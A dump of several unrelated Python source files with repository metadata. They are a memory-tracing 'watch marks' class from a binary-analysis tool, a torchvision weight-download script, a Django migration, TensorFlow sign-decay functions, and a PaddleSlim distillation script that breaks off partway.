def copy(self, src, dest, length, buf_start, op_type, strcpy=False, truncated=None):
#sp, base = self.getStackBase(dest)
sp = self.isStackBuf(dest)
cm = CopyMark(src, dest, length, buf_start, op_type, strcpy, sp=sp, truncated=truncated)
self.lgr.debug('watchMarks copy %s' % (cm.getMsg()))
#self.removeRedundantDataMark(dest)
wm = self.addWatchMark(cm)
return wm
def memset(self, dest, length, buf_start):
sm = SetMark(dest, length, buf_start, self.lgr)
self.addWatchMark(sm)
self.lgr.debug('watchMarks memset %s' % (sm.getMsg()))
def kernel(self, addr, count, fd, callnum):
km = KernelMark(addr, count, callnum, fd)
self.addWatchMark(km)
self.lgr.debug('watchMarks kernel %s' % (km.getMsg()))
def kernelMod(self, addr, count, frame):
callnum = self.mem_utils.getCallNum(self.cpu)
fd = frame['param1']
km = KernelModMark(addr, count, callnum, fd)
self.addWatchMark(km)
self.lgr.debug('watchMarks kernelMod %s' % (km.getMsg()))
def compare(self, fun, dest, src, count, buf_start):
if count > 0:
dst_str = self.mem_utils.readString(self.cpu, dest, count)
if dst_str is not None:
if (sys.version_info < (3,0)):
self.lgr.debug('watchMarks compare, do decode')
dst_str = dst_str.decode('ascii', 'replace')
src_str = self.mem_utils.readString(self.cpu, src, count)
if src_str is not None:
if (sys.version_info < (3,0)):
self.lgr.debug('watchMarks compare, do decode')
src_str = src_str.decode('ascii', 'replace')
src_str = src_str.replace('\n\r','<newline>')
src_str = src_str.replace('\n','<newline>')
src_str = src_str.replace('\t','<tab>')
#hexstring = ":".join("{:02x}".format(ord(c)) for c in src_str)
#self.lgr.debug('srcdst_string hex is %s' % hexstring)
else:
dst_str = ''
src_str = ''
cm = CompareMark(fun, dest, src, count, dst_str, src_str, buf_start)
self.addWatchMark(cm)
self.lgr.debug('watchMarks compare (%s) %s' % (fun, cm.getMsg()))
def strchr(self, start, the_chr, count):
cm = StrChrMark(start, the_chr, count)
self.removeRedundantDataMark(start)
self.addWatchMark(cm)
self.lgr.debug('watchMarks strchr %s' % (cm.getMsg()))
def strtoul(self, fun, src):
cm = StrtousMark(fun, src)
self.addWatchMark(cm)
self.lgr.debug('watchMarks strtous %s' % (cm.getMsg()))
def sscanf(self, src, dest, count, buf_start):
#sp, base = self.getStackBase(dest)
if dest is not None:
sp = self.isStackBuf(dest)
else:
sp = None
sm = ScanMark(src, dest, count, buf_start, sp)
wm = self.addWatchMark(sm)
self.lgr.debug('watchMarks sscanf %s' % (sm.getMsg()))
return wm
def strlen(self, src, count):
lm = LenMark(src, count)
self.addWatchMark(lm)
self.lgr.debug('watchMarks strlen %s' % (lm.getMsg()))
def sprintf(self, fun, src, dest, count, buf_start):
#sp, base = self.getStackBase(dest)
sp = self.isStackBuf(dest)
lm = SprintfMark(fun, src, dest, count, buf_start, sp)
wm = self.addWatchMark(lm)
self.lgr.debug('watchMarks %s %s' % (fun, lm.getMsg()))
return wm
def fprintf(self, fun, src):
lm = FprintfMark(fun, src)
wm = self.addWatchMark(lm)
self.lgr.debug('watchMarks %s %s' % (fun, lm.getMsg()))
return wm
def fwrite(self, fun, src, count):
wm = FwriteMark(fun, src, count)
self.addWatchMark(wm)
self.lgr.debug('watchMarks %s %s' % (fun, wm.getMsg()))
def glob(self, fun, src, count):
wm = GlobMark(fun, src, count)
self.addWatchMark(wm)
self.lgr.debug('watchMarks %s %s' % (fun, wm.getMsg()))
def inet_addr(self, src, count, the_string):
xm = InetAddrMark(src, count, the_string)
self.addWatchMark(xm)
self.lgr.debug('watchMarks inet_addr %s' % (xm.getMsg()))
def inet_ntop(self, dest, count, the_string):
xm = InetNtopMark(dest, count, the_string)
self.lgr.debug('watchMarks inet_ntop %s' % (xm.getMsg()))
wm = self.addWatchMark(xm)
return wm
def xmlGetProp(self, src, count, the_string, dest):
result = 'Not found'
if dest != 0:
result = self.mem_utils.readString(self.cpu, dest, 20)
xm = XMLPropMark(src, count, the_string, result)
self.addWatchMark(xm)
self.lgr.debug('watchMarks xmlGetProp %s' % (xm.getMsg()))
def iterator(self, fun, src, buf_start):
im = IteratorMark(fun, src, buf_start)
self.addWatchMark(im)
self.lgr.debug('watchMarks iterator %s' % (im.getMsg()))
def malloc(self, addr, size):
mm = MallocMark(addr, size)
self.addWatchMark(mm)
self.lgr.debug('watchMarks malloc %s' % (mm.getMsg()))
def free(self, addr, fun):
if addr is not None:
fm = FreeMark(addr, fun)
self.addWatchMark(fm)
self.lgr.debug('watchMarks free %s' % (fm.getMsg()))
else:
self.lgr.debug('watchMarks free %s but addr is none' % fun)
def freeXMLDoc(self):
fm = FreeXMLMark()
self.addWatchMark(fm)
def xmlParseFile(self, dest, count):
fm = XMLParseFileMark(dest, count)
self.addWatchMark(fm)
def getToken(self, src, dest, the_string):
fm = GetTokenMark(src, dest, the_string)
self.addWatchMark(fm)
def strPtr(self, dest, fun):
the_string = self.mem_utils.readString(self.cpu, dest, 40)
fm = StrPtr(fun, the_string)
self.addWatchMark(fm)
def returnInt(self, count, fun):
fm = ReturnInt(fun, count)
self.addWatchMark(fm)
def logMark(self, s, prefix):
lm = LogMark(s, prefix)
self.addWatchMark(lm)
def pushMark(self, src, dest, buf_start, length, ip):
pm = PushMark(src, dest, buf_start, length, ip, self.mem_utils.WORD_SIZE)
wm = self.addWatchMark(pm)
return wm
def fgetsMark(self, fun, src, dest, count, start):
fm = FGetsMark(fun, src, dest, count, start)
self.addWatchMark(fm)
def stringMark(self, fun, src, dest, count, start):
fm = StringMark(fun, src, dest, count, start)
self.addWatchMark(fm)
def replaceMark(self, fun, src, dest, pos, length, start):
fm = ReplaceMark(fun, src, dest, pos, length, start)
self.addWatchMark(fm)
def appendMark(self, fun, src, dest, length, start):
fm = AppendMark(fun, src, dest, length, start)
self.addWatchMark(fm)
def assignMark(self, fun, src, dest, length, start):
fm = AssignMark(fun, src, dest, length, start)
self.addWatchMark(fm)
def charLookupMark(self, addr, msg, length=None):
add_mark = True
if length is None:
if len(self.mark_list) > 0:
pm = self.mark_list[-1]
if isinstance(pm.mark, CharLookupMark) and addr == (pm.mark.end_addr+1):
pm.mark.extend()
add_mark = False
if add_mark:
cm = CharLookupMark(addr, msg, length)
self.addWatchMark(cm)
def charPtrMark(self, addr, ptr, value):
cm = CharPtrMark(addr, ptr, value)
self.addWatchMark(cm)
def mscMark(self, fun, src):
fm = MscMark(fun, src)
self.addWatchMark(fm)
self.lgr.debug(fm.getMsg())
def clearWatchMarks(self, record_old=False):
self.lgr.debug('watchMarks clearWatchMarks, entered with %d marks and %d stale marks' % (len(self.mark_list), len(self.stale_marks)))
if record_old:
self.stale_marks.extend(self.mark_list)
del self.mark_list[:]
self.mark_list = []
self.prev_ip = []
self.lgr.debug('watchMarks clearWatchMarks, leave with %d marks and %d stale marks' % (len(self.mark_list), len(self.stale_marks)))
def firstBufferAddress(self):
''' address of first buffer '''
retval = None
''' maximum length per initial read '''
max_len = None
for mark in self.mark_list:
self.lgr.debug('check mark type %s' % type(mark.mark))
if isinstance(mark.mark, CallMark) and mark.mark.recv_addr is not None:
self.lgr.debug('watchMarks firstBufferAddress is CallMark addr 0x%x' % mark.mark.recv_addr)
retval = mark.mark.recv_addr
max_len = mark.mark.max_len
break
elif isinstance(mark.mark, DataMark):
self.lgr.debug('watchMarks firstBufferAddress is DataMark addr 0x%x' % mark.mark.start)
retval = mark.mark.start
max_len = self.recent_buf_max_len
break
if retval is not None:
self.recent_buf_address = retval
self.recent_buf_max_len = max_len
self.lgr.debug('watchMarks firstBuffer address 0x%x' % retval)
elif self.recent_buf_address is not None:
#self.lgr.debug('watchMarks firstBufferAddress, no marks, using recent 0x%x' % self.recent_buf_address)
retval = self.recent_buf_address
max_len = self.recent_buf_max_len
else:
self.lgr.error('watchMarks, no recent_buf_address was recorded')
return retval, max_len
def firstBufferIndex(self):
retval = None
index = 1
for mark in self.mark_list:
if isinstance(mark.mark, CallMark) and mark.mark.recv_addr is not None:
self.lgr.debug('watchMarks firstBufferIndex is CallMark addr 0x%x' % mark.mark.recv_addr)
retval = index
break
elif isinstance(mark.mark, DataMark):
self.lgr.debug('watchMarks firstBufferIndex is DataMark addr 0x%x' % mark.mark.start)
retval = index
break
index += 1
return retval
def nextWatchMark(self):
retval = None
cur_cycle = self.cpu.cycles
index = 1
for mark in self.mark_list:
if mark.cycle > cur_cycle:
retval = index
break
index += 1
return retval
def undoMark(self):
self.mark_list.pop()
def latestCycle(self):
if len(self.mark_list) > 0:
latest_mark = self.mark_list[-1]
return latest_mark.cycle
else:
return None
def registerCallCycle(self):
self.call_cycle = self.cpu.cycles
def getCallCycle(self):
return self.call_cycle
def readCount(self):
''' get count of read/recv, i.e., CallMarks having recv_addr values '''
retval = 0
prev_cycle = 0
for mark in self.mark_list:
if isinstance(mark.mark, CallMark):
if mark.mark.recv_addr is not None and mark.call_cycle != prev_cycle:
retval += 1
prev_cycle = mark.call_cycle
return retval
def whichRead(self):
''' Return the number of reads that have occured prior to this cycle.
Intended to decorate automated backtrace bookmarks with context.'''
found = None
num_reads = 0
self.lgr.debug('watchMarks whichRead')
for mark in reversed(self.mark_list):
if mark.call_cycle is not None and mark.call_cycle > self.cpu.cycles:
continue
self.lgr.debug('watchMarks whichRead mark.mark %s' % str(mark.mark))
if isinstance(mark.mark, CallMark):
if mark.mark.recv_addr is not None:
num_reads += 1
self.lgr.debug('num_reads now %d' % num_reads)
if mark.call_cycle is not None and mark.call_cycle >= self.cpu.cycles:
self.lgr.debug('num_reads found num_reads %d' % num_reads)
found = num_reads
if found is None:
retval = None
else:
retval = num_reads - (found - 1)
return retval
def markCount(self):
return (len(self.mark_list) + len(self.stale_marks))
def getMarks(self):
return self.mark.list
def loadPickle(self, name):
mark_file = os.path.join('./', name, self.cell_name, 'watchMarks.pickle')
if os.path.isfile(mark_file):
pickDict = pickle.load( open(mark_file, 'rb') )
self.recent_buf_address = pickDict['recent_buf_address']
self.recent_buf_max_len = pickDict['recent_buf_max_len']
def pickleit(self, name):
mark_file = os.path.join('./', name, self.cell_name, 'watchMarks.pickle')
pickDict = {}
pickDict['recent_buf_address'] = self.recent_buf_address
pickDict['recent_buf_max_len'] = self.recent_buf_max_len
self.lgr.debug('watchMarks pickleit to %s recent_buf_addres: %s' % (mark_file, str(self.recent_buf_address)))
pickle.dump( pickDict, open( mark_file, "wb") )
def saveJson(self, fname, packet=1):
my_marks = []
start_index = 1
self.lgr.debug('watchMarks saveJson %d marks to file %s packet %d' % (len(self.mark_list), fname, packet))
if os.path.isfile(fname):
try:
combined = json.load(open(fname))
my_marks = combined['marks']
start_index = len(my_marks)
self.lgr.debug('watchMarks loaded my_marks with %d marks' % len(my_marks))
except:
my_marks = []
new_marks = self.getJson(self.mark_list, packet=packet, start_index=start_index)
my_marks.extend(new_marks)
with open(fname, 'w') as fh:
combined = {}
combined['somap'] = self.so_map
combined['marks'] = my_marks
json.dump(combined, fh)
def getDataWatchList(self):
''' get list intended for use in recontructing data watches '''
my_marks = []
for mark in self.mark_list:
if isinstance(mark.mark, ResetOrigin):
for origin_watch in mark.mark.origin_watches:
entry = {}
entry['cycle'] = mark.cycle
entry['start'] = origin_watch['start']
entry['length'] = origin_watch['length']
my_marks.append(entry)
else:
entry = {}
entry['cycle'] = mark.cycle
if isinstance(mark.mark, CopyMark):
entry['start'] = mark.mark.dest
entry['length'] = mark.mark.length
elif isinstance(mark.mark, ScanMark):
entry['start'] = mark.mark.dest
entry['length'] = mark.mark.count
elif isinstance(mark.mark, SprintfMark):
entry['start'] = mark.mark.dest
entry['length'] = mark.mark.count
elif isinstance(mark.mark, CallMark):
entry['start'] = mark.mark.recv_addr
entry['length'] = mark.mark.len
elif isinstance(mark.mark, DataMark) and not mark.mark.modify:
entry['start'] = mark.mark.addr
entry['length'] = mark.mark.trans_size
elif isinstance(mark.mark, DataMark) and mark.mark.modify:
entry['start'] = mark.mark.addr
entry['length'] = mark.mark.trans_size
if 'start' in entry:
my_marks.append(entry)
return my_marks
def getAllJson(self):
self.lgr.debug('getAllJson %d stale and %d new marks' % (len(self.stale_marks), len(self.mark_list)))
all_marks = self.getJson(self.stale_marks)
new_marks = self.getJson(self.mark_list, start_index=len(self.stale_marks))
all_marks.extend(new_marks)
self.lgr.debug('getAllJson returning %d marks' % len(all_marks))
return all_marks
def getJson(self, mark_list, packet=1, start_index=1):
my_marks = []
index = start_index
for mark in mark_list:
entry = {}
entry['ip'] = mark.ip
entry['cycle'] = mark.cycle
entry['packet'] = packet
entry['index'] = index
index = index + 1
#self.lgr.debug('saveJson mark %s' % str(mark.mark))
if isinstance(mark.mark, CopyMark):
entry['mark_type'] = 'copy'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.length
entry['reference_buffer'] = mark.mark.buf_start
elif isinstance(mark.mark, DataMark) and mark.mark.ad_hoc and mark.mark.start is not None:
entry['mark_type'] = 'copy'
entry['src'] = mark.mark.addr
entry['dest'] = mark.mark.dest
entry['length'] = (mark.mark.end_addr - mark.mark.addr)+1
entry['reference_buffer'] = mark.mark.start
elif isinstance(mark.mark, ScanMark):
entry['mark_type'] = 'scan'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.count
entry['reference_buffer'] = mark.mark.buf_start
elif isinstance(mark.mark, SprintfMark):
entry['mark_type'] = 'sprint'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['count'] = mark.mark.count
entry['reference_buffer'] = mark.mark.buf_start
elif isinstance(mark.mark, CallMark):
entry['mark_type'] = 'call'
entry['recv_addr'] = mark.mark.recv_addr
entry['length'] = mark.mark.len
entry['fd'] = mark.mark.fd
elif isinstance(mark.mark, DataMark) and not mark.mark.modify and not mark.mark.ad_hoc:
entry['mark_type'] = 'read'
entry['addr'] = mark.mark.addr
entry['reference_buffer'] = mark.mark.start
entry['trans_size'] = mark.mark.trans_size
entry['value'] = mark.mark.value
elif isinstance(mark.mark, DataMark) and mark.mark.modify:
entry['mark_type'] = 'write'
entry['addr'] = mark.mark.addr
entry['reference_buffer'] = mark.mark.start
entry['trans_size'] = mark.mark.trans_size
elif isinstance(mark.mark, KernelMark):
entry['mark_type'] = 'kernel'
entry['addr'] = mark.mark.addr
entry['count'] = mark.mark.count
entry['callnum'] = mark.mark.callnum
entry['fd'] = mark.mark.fd
elif isinstance(mark.mark, StrChrMark):
entry['mark_type'] = 'strchr'
entry['the_char'] = mark.mark.the_chr
entry['start'] = mark.mark.start
entry['count'] = mark.mark.count
elif isinstance(mark.mark, CompareMark):
entry['mark_type'] = 'compare'
entry['src_str'] = mark.mark.src_str
entry['dst_str'] = mark.mark.dst_str
entry['ours'] = mark.mark.ours
entry['theirs'] = mark.mark.theirs
entry['count'] = mark.mark.count
elif isinstance(mark.mark, StrtousMark):
entry['mark_type'] = 'strt'
entry['src'] = mark.mark.src
elif isinstance(mark.mark, StringMark):
entry['mark_type'] = 'string'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.length
elif isinstance(mark.mark, ReplaceMark):
entry['mark_type'] = 'replace'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['pos'] = mark.mark.pos
entry['length'] = mark.mark.length
elif isinstance(mark.mark, AppendMark):
entry['mark_type'] = 'append'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.length
elif isinstance(mark.mark, AssignMark):
entry['mark_type'] = 'assign'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.length
elif isinstance(mark.mark, MscMark):
entry['mark_type'] = 'msc'
entry['src'] = mark.mark.addr
elif isinstance(mark.mark, LenMark):
entry['mark_type'] = 'len'
entry['src'] = mark.mark.src
entry['count'] = mark.mark.count
elif isinstance(mark.mark, CharLookupMark):
entry['mark_type'] = 'char_lookup'
entry['addr'] = mark.mark.addr
entry['length'] = mark.mark.length
entry['stuff'] = mark.mark.stuff
elif isinstance(mark.mark, CharPtrMark):
entry['mark_type'] = 'char_ptr'
entry['addr'] = mark.mark.addr
entry['ptr'] = mark.mark.ptr
entry['value'] = mark.mark.value
elif isinstance(mark.mark, IteratorMark) or isinstance(mark.mark, KernelModMark) or isinstance(mark.mark, SetMark):
continue
else:
self.lgr.debug('unknown mark type? %s' % str(mark.mark))
continue
my_marks.append(entry)
return my_marks
|
e6da989f8714a843e3acd3d6592f26f0f857ec86
|
38bed8ec0229b2d42ebdb33e09930ba8ee6ba5b7
|
/scripts/download_model_urls.py
|
f5f53d71e98f1c0c82d74bdb5b6cca122c4090c2
|
[
"BSD-3-Clause",
"CC-BY-NC-4.0"
] |
permissive
|
pytorch/vision
|
10443ac1eddf7a32ecb288fe8f58e28cab2a60a1
|
1f94320d8db8d102214a7dc02c22fa65ee9ac58a
|
refs/heads/main
| 2023-09-06T03:48:02.303020
| 2023-09-04T18:25:36
| 2023-09-04T18:25:36
| 73,328,905
| 15,620
| 8,564
|
BSD-3-Clause
| 2023-09-14T17:52:49
| 2016-11-09T23:11:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,382
|
py
|
download_model_urls.py
|
import asyncio
import sys
from pathlib import Path
from time import perf_counter
from urllib.parse import urlsplit
import aiofiles
import aiohttp
from torchvision import models
from tqdm.asyncio import tqdm
async def main(download_root):
download_root.mkdir(parents=True, exist_ok=True)
urls = {weight.url for name in models.list_models() for weight in iter(models.get_model_weights(name))}
async with aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=None)) as session:
await tqdm.gather(*[download(download_root, session, url) for url in urls])
async def download(download_root, session, url):
response = await session.get(url, params=dict(source="ci"))
assert response.ok
file_name = Path(urlsplit(url).path).name
async with aiofiles.open(download_root / file_name, "wb") as f:
async for data in response.content.iter_any():
await f.write(data)
if __name__ == "__main__":
download_root = (
(Path(sys.argv[1]) if len(sys.argv) > 1 else Path("~/.cache/torch/hub/checkpoints")).expanduser().resolve()
)
print(f"Downloading model weights to {download_root}")
start = perf_counter()
asyncio.get_event_loop().run_until_complete(main(download_root))
stop = perf_counter()
minutes, seconds = divmod(stop - start, 60)
print(f"Download took {minutes:2.0f}m {seconds:2.0f}s")
|
b812f805d7535500bd75ad8a12c6564f8bd0a31a
|
5a3f4e19b8c64410a9a974ddcd34090fb2430515
|
/blogs/migrations/0080_auto_20230301_1332.py
|
0b494d31a143e0f92263c89f82ab8825091307a5
|
[
"MIT"
] |
permissive
|
HermanMartinus/bearblog
|
daf41622097cc23378986695ae9c9a3e7ecd3696
|
d5f326037e29658fed3c7b82439504ea7e8f1ab0
|
refs/heads/master
| 2023-09-01T02:52:22.226777
| 2023-08-29T09:02:14
| 2023-08-29T09:02:14
| 266,561,292
| 1,768
| 80
|
MIT
| 2023-05-02T10:32:57
| 2020-05-24T14:44:59
|
CSS
|
UTF-8
|
Python
| false
| false
| 404
|
py
|
0080_auto_20230301_1332.py
|
# Generated by Django 3.1.14 on 2023-03-01 13:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogs', '0079_blog_order_id'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='order_id',
field=models.CharField(blank=True, max_length=200, null=True),
),
]
|
534f6b8fc606f9f8a6ef2076641440d6134f07d0
|
fbbe424559f64e9a94116a07eaaa555a01b0a7bb
|
/Keras_tensorflow_nightly/source2.7/tensorflow/contrib/opt/python/training/sign_decay.py
|
e8870c072110da145c0bb78e20c3584083438ea0
|
[
"MIT"
] |
permissive
|
ryfeus/lambda-packs
|
6544adb4dec19b8e71d75c24d8ed789b785b0369
|
cabf6e4f1970dc14302f87414f170de19944bac2
|
refs/heads/master
| 2022-12-07T16:18:52.475504
| 2022-11-29T13:35:35
| 2022-11-29T13:35:35
| 71,386,735
| 1,283
| 263
|
MIT
| 2022-11-26T05:02:14
| 2016-10-19T18:22:39
|
Python
|
UTF-8
|
Python
| false
| false
| 5,800
|
py
|
sign_decay.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of the sign decay functions used in PowerSign and AddSign.
See [Bello et al., ICML 2017] Neural Optimizer Search with Reinforcement
Learning for details.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
def get_linear_decay_fn(decay_steps):
"""Returns a function that computes a linear decay.
This decay computes linear annealing:
max(0, (decay_steps - global_step) / decay_steps)
Example usage:
```
decay_steps = 1000
linear_decay_fn = get_linear_decay_fn(decay_steps)
decayed = linear_decay_fn(global_step)
x *= decayed
```
Args:
decay_steps: number of steps to decay over.
Returns:
linear_decay_fn: a function that computes the linear decay.
"""
# pylint:disable=missing-docstring
def linear_decay_fn(global_step):
if global_step is None:
raise ValueError("global_step is required for linear_decay.")
global_step = math_ops.minimum(global_step, decay_steps)
remaining_steps = math_ops.to_int32(decay_steps) - math_ops.to_int32(
global_step)
decayed = math_ops.to_float(remaining_steps) / math_ops.to_float(
decay_steps)
return math_ops.maximum(0.0, decayed)
# pylint:enable=missing-docstring
return linear_decay_fn
def get_cosine_decay_fn(decay_steps, num_periods=0.5, zero_after=None):
"""Returns a function that computes a cosine decay.
This decay computes cosine annealing:
0.5 * (1.0 + cos(2.0 * pi * num_periods * global_step / decay_steps))
This decay can be used to decay the sign quantity in the AddSign and PowerSign
optimizers discovered in
[Bello et al., ICML 2017] Neural Optimizer Search with RL.
Example usage:
```
decay_steps = 1000
num_periods = 2
cosine_decay_fn = get_cosine_decay_fn(decay_steps, num_periods=num_periods)
decayed = cosine_decay_fn(global_step)
x *= decayed
```
Args:
decay_steps: number of steps to decay over.
num_periods: number of periods for cosine signal. 0.5 by default,
which maps the last decay step to 0.
zero_after: if not None, number after which the decay function
will just return 0.
Returns:
cosine_decay_fn: a function that computes the cosine decay.
"""
# pylint:disable=missing-docstring
def cosine_decay_fn(global_step):
if global_step is None:
raise ValueError("global_step is required for cosine_decay.")
global_step = math_ops.minimum(global_step, decay_steps)
completed_fraction = math_ops.to_float(global_step) / math_ops.to_float(
decay_steps)
fraction = 2.0 * num_periods * completed_fraction
decayed = 0.5 * (
1.0 + math_ops.cos(constant_op.constant(math.pi) * fraction))
if zero_after is not None:
decayed = array_ops.where(
math_ops.greater_equal(fraction, 2 * zero_after), 0.0, decayed)
return decayed
# pylint:enable=missing-docstring
return cosine_decay_fn
def get_restart_decay_fn(decay_steps, num_periods=1, zero_after=None):
"""Returns a function that computes a restart decay.
This decay computes
0.5 * (1.0 + cos(pi * (num_periods * global_step) % num_training_steps))
This is a simplified version of the restart decay introduced in
"SGDR: Stochastic Gradient Descent with Warm Restarts"
by Ilya Loshchilov & Frank Hutter, Proceedings of
ICLR'2017, available at https://arxiv.org/pdf/1608.03983.pdf
This decay can be used to decay the sign quantity in the AddSign and PowerSign
optimizers discovered in
[Bello et al., ICML 2017] Neural Optimizer Search with RL.
Example usage:
```
decay_steps = 1000
num_periods = 2.0
restart_decay_fn = get_restart_decay_fn(decay_steps,
num_periods=num_periods)
decayed = restart_decay_fn(global_step)
x *= decayed
```
Args:
decay_steps: number of steps to decay over.
num_periods: number of periods for cosine signal. 1 by default,
which maps the last decay step to 0.
zero_after: if not None, number after which the decay function
will return 0.
Returns:
restart_decay_fn: a function that computes the restart decay.
"""
# pylint:disable=missing-docstring
def restart_decay_fn(global_step):
if global_step is None:
raise ValueError("global_step is required for cosine_decay.")
global_step = math_ops.minimum(global_step, decay_steps)
num = math_ops.mod(num_periods * math_ops.to_float(global_step),
decay_steps)
fraction = num / math_ops.to_float(decay_steps)
decayed = 0.5 * (
1.0 + math_ops.cos(constant_op.constant(math.pi) * fraction))
if zero_after is not None:
tmp = math_ops.to_float(
num_periods * global_step) / math_ops.to_float(decay_steps)
decayed = array_ops.where(
math_ops.greater_equal(tmp, zero_after), 0.0, decayed)
return decayed
# pylint:enable=missing-docstring
return restart_decay_fn
|
479117d0016c752444f0078a182e448896dc9090
|
b04cc98a746d1df457183bc14908094a8be00ba1
|
/demo/distillation/distill.py
|
2adeae58dd2b4a5c8acc9720b035b3c4cb586f13
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleSlim
|
a3bcaef0c92016b7f6946d58787f87c7db8ff3f8
|
bb02b103a89a09635941bc0bbbd38506d7412468
|
refs/heads/develop
| 2023-08-31T01:47:27.824722
| 2023-08-25T08:06:08
| 2023-08-25T08:06:08
| 228,290,594
| 1,534
| 402
|
Apache-2.0
| 2023-08-29T09:37:55
| 2019-12-16T02:56:50
|
Python
|
UTF-8
|
Python
| false
| false
| 9,850
|
py
|
distill.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import math
import logging
import paddle
import argparse
import functools
import numpy as np
sys.path[0] = os.path.join(os.path.dirname("__file__"), os.path.pardir)
import models
from utility import add_arguments, print_arguments, _download, _decompress
from paddleslim.dist import merge, l2, soft_label
from paddle.distributed import fleet
from paddle.distributed.fleet import DistributedStrategy
logging.basicConfig(format='%(asctime)s-%(levelname)s: %(message)s')
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.INFO)
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('batch_size', int, 256, "Minibatch size.")
add_arg('use_gpu', bool, True, "Whether to use GPU or not.")
add_arg('save_inference', bool, False, "Whether to save inference model.")
add_arg('total_images', int, 1281167, "Training image number.")
add_arg('image_shape', str, "3,224,224", "Input image size")
add_arg('lr', float, 0.1, "The learning rate used to fine-tune pruned model.")
add_arg('lr_strategy', str, "piecewise_decay", "The learning rate decay strategy.")
add_arg('l2_decay', float, 3e-5, "The l2_decay parameter.")
add_arg('momentum_rate', float, 0.9, "The value of momentum_rate.")
add_arg('num_epochs', int, 120, "The number of total epochs.")
add_arg('data', str, "imagenet", "Which data to use. 'cifar10' or 'imagenet'")
add_arg('log_period', int, 20, "Log period in batches.")
add_arg('model', str, "MobileNet", "Set the network to use.")
add_arg('pretrained_model', str, None, "Whether to use pretrained model.")
add_arg('teacher_model', str, "ResNet50_vd", "Set the teacher network to use.")
add_arg('teacher_pretrained_model', str, "./ResNet50_vd_pretrained", "Whether to use pretrained model.")
parser.add_argument('--step_epochs', nargs='+', type=int, default=[30, 60, 90], help="piecewise decay step")
# yapf: enable
model_list = [m for m in dir(models) if "__" not in m]
def piecewise_decay(args):
step = int(math.ceil(float(args.total_images) / args.batch_size))
bd = [step * e for e in args.step_epochs]
lr = [args.lr * (0.1**i) for i in range(len(bd) + 1)]
learning_rate = paddle.optimizer.lr.PiecewiseDecay(
boundaries=bd, values=lr, verbose=False)
optimizer = paddle.optimizer.Momentum(
learning_rate=learning_rate,
momentum=args.momentum_rate,
weight_decay=paddle.regularizer.L2Decay(args.l2_decay))
return learning_rate, optimizer
def cosine_decay(args):
step = int(math.ceil(float(args.total_images) / args.batch_size))
learning_rate = paddle.optimizer.lr.CosineAnnealingDecay(
learning_rate=args.lr, T_max=step * args.num_epochs, verbose=False)
optimizer = paddle.optimizer.Momentum(
learning_rate=learning_rate,
momentum=args.momentum_rate,
weight_decay=paddle.regularizer.L2Decay(args.l2_decay))
return learning_rate, optimizer
def create_optimizer(args):
if args.lr_strategy == "piecewise_decay":
return piecewise_decay(args)
elif args.lr_strategy == "cosine_decay":
return cosine_decay(args)
def compress(args):
fleet.init(is_collective=True)
if args.data == "cifar10":
train_dataset = paddle.vision.datasets.Cifar10(mode='train')
val_dataset = paddle.vision.datasets.Cifar10(mode='test')
class_dim = 10
image_shape = "3,32,32"
elif args.data == "imagenet":
import imagenet_reader as reader
train_dataset = reader.ImageNetDataset(mode='train')
val_dataset = reader.ImageNetDataset(mode='val')
class_dim = 1000
image_shape = "3,224,224"
else:
raise ValueError("{} is not supported.".format(args.data))
image_shape = [int(m) for m in image_shape.split(",")]
assert args.model in model_list, "{} is not in lists: {}".format(
args.model, model_list)
student_program = paddle.static.Program()
s_startup = paddle.static.Program()
places = paddle.static.cuda_places(
) if args.use_gpu else paddle.static.cpu_places()
place = places[0]
if args.use_gpu:
devices_num = paddle.framework.core.get_cuda_device_count()
else:
devices_num = int(os.environ.get('CPU_NUM', 1))
with paddle.static.program_guard(student_program, s_startup):
image = paddle.static.data(
name='image', shape=[None] + image_shape, dtype='float32')
label = paddle.static.data(name='label', shape=[None, 1], dtype='int64')
sampler = paddle.io.DistributedBatchSampler(
train_dataset,
shuffle=False,
drop_last=True,
batch_size=args.batch_size)
train_loader = paddle.io.DataLoader(
train_dataset,
places=places,
feed_list=[image, label],
batch_sampler=sampler,
return_list=False,
use_shared_memory=False,
num_workers=4)
valid_loader = paddle.io.DataLoader(
val_dataset,
places=place,
feed_list=[image, label],
drop_last=False,
return_list=False,
use_shared_memory=False,
batch_size=args.batch_size,
shuffle=False)
# model definition
model = models.__dict__[args.model]()
out = model.net(input=image, class_dim=class_dim)
cost = paddle.nn.functional.loss.cross_entropy(input=out, label=label)
avg_cost = paddle.mean(x=cost)
acc_top1 = paddle.metric.accuracy(input=out, label=label, k=1)
acc_top5 = paddle.metric.accuracy(input=out, label=label, k=5)
val_program = student_program.clone(for_test=True)
exe = paddle.static.Executor(place)
teacher_model = models.__dict__[args.teacher_model]()
# define teacher program
teacher_program = paddle.static.Program()
t_startup = paddle.static.Program()
with paddle.static.program_guard(teacher_program, t_startup):
